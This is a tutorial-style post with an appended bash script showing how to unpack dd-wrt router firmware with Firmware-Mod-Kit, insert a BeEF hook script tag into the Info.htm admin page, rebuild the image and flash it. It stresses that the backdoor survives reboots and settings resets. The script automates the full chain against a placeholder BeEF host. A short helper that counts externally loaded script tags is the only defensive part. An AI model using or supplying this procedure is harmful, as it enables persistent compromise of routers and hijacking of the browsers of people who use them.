Firmware-Mod-Kit to make Malicious Firmware
First, we need to extract the firmware we are going to modify. I am using a router that runs dd-wrt, so I figured that would be a good firmware to grab and rip apart. From the Firmware-Mod-Kit directory, run ./extract-firmware.sh filename, substituting the image you downloaded. This decompresses the image and lays its pieces out neatly in an fmk/ directory.
Next we extract the dd-wrt GUI (the web pages the router's admin interface serves) by running ./ddwrt-gui-extract.sh. dd-wrt stores these pages in compressed form inside the image, which is why they need a separate extraction step before they can be edited.
We then find our target page, Info.htm (dd-wrt's system information page), open it and add our BeEF hook: a script tag that loads hook.js from the BeEF server, so that any browser rendering the page is enrolled in BeEF.
We package it all back up with ./ddwrt-gui-rebuild.sh followed by ./build-firmware.sh. When that is done, we flash the router with the new image. The next time we open the page, our browser is hooked and can be exploited through BeEF. Because the hook lives in the firmware image itself rather than in the router's configuration, it survives reboots and a factory reset of the settings; only reflashing a clean image removes it.
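The procedure above, scripted end to end, as an added example that is not from the original post or from the Firmware-Mod-Kit project. It assumes an FMK checkout at $FMK_DIR, a BeEF server whose hook is reachable at $BEEF_URL (192.0.2.10:3000 is a documentation address; substitute your own), and that the extracted GUI lands somewhere under fmk/ (the exact subdirectory varies between FMK versions, so the script locates Info.htm with find). The functions inject_hook and count_external_scripts are illustrative helpers written for this example, not FMK tools. The second one is the defender's side of the same story: it counts script tags in an extracted GUI tree that load from an absolute http(s) URL, which is how a page hooked like this stands out when you extract a suspect image and compare it with a clean one.

```shell
#!/usr/bin/env bash
# Added example, not from the original post or from Firmware-Mod-Kit.
# Scripts the procedure above: extract -> extract GUI -> inject BeEF hook
# into Info.htm -> rebuild GUI -> build firmware.
# Assumptions (not stated on the page): FMK checkout in $FMK_DIR, BeEF hook
# served at $BEEF_URL (192.0.2.10 is an RFC 5737 documentation address),
# and the extracted GUI somewhere under fmk/ (located with find).
set -eu

FMK_DIR="${FMK_DIR:-$HOME/firmware-mod-kit}"
BEEF_URL="${BEEF_URL:-http://192.0.2.10:3000/hook.js}"
TARGET_PAGE="${TARGET_PAGE:-Info.htm}"

# inject_hook FILE URL
# Writes FILE to stdout with <script src="URL"></script> inserted on the line
# before the closing </body> tag, or appended if the page has no </body>.
# Idempotent: a page that already carries this exact tag is passed through.
inject_hook() {
  local file="$1" url="$2"
  local tag="<script src=\"$url\"></script>"
  if grep -qF -- "$tag" "$file"; then
    cat "$file"
  elif grep -qi '</body>' "$file"; then
    # Print every line; emit the tag once, just before the first </body>.
    awk -v tag="$tag" '
      !done && tolower($0) ~ /<\/body>/ { print tag; done = 1 }
      { print }' "$file"
  else
    cat "$file"
    printf '%s\n' "$tag"
  fi
}

# count_external_scripts DIR
# Defender-side check (heuristic): counts <script ... src="http(s)://..."> tags
# under DIR. An embedded GUI normally loads its scripts from the device itself,
# so an absolute off-device URL in an extracted GUI tree deserves a look.
count_external_scripts() {
  { grep -rEoi '<script[^>]+src="https?://[^"]+"' "$1" || true; } | wc -l | tr -d ' '
}

# build_malicious_firmware ORIGINAL_IMAGE
# The post's steps in order. Needs a working FMK checkout, so it only runs
# when this script is invoked with an image path.
build_malicious_firmware() {
  local firmware="$1"
  (
    cd "$FMK_DIR"
    ./extract-firmware.sh "$firmware"   # unpacks the image into fmk/
    ./ddwrt-gui-extract.sh              # decompresses the dd-wrt GUI pages
    page="$(find fmk -name "$TARGET_PAGE" -print -quit)"
    if [ -z "$page" ]; then
      echo "$TARGET_PAGE not found under fmk/" >&2
      exit 1
    fi
    inject_hook "$page" "$BEEF_URL" > "$page.tmp" && mv "$page.tmp" "$page"
    ./ddwrt-gui-rebuild.sh              # recompresses the GUI with the hooked page
    ./build-firmware.sh                 # writes the patched image (fmk/new-firmware.bin in stock FMK)
  )
}

if [ "$#" -ge 1 ]; then
  # Make the image path absolute, since build_malicious_firmware cd's into FMK.
  build_malicious_firmware "$(cd "$(dirname "$1")" && pwd)/$(basename "$1")"
  echo "Hooked image built; flash it to the router as described above."
fi
```

Run it as ./fmk-hook.sh original.bin (script and image names are assumptions) and flash the resulting image as in the post. To use the defender's check on its own, source the file and call count_external_scripts on the GUI directory that ./ddwrt-gui-extract.sh produced from a suspect image; a clean dd-wrt extraction is the baseline to compare against.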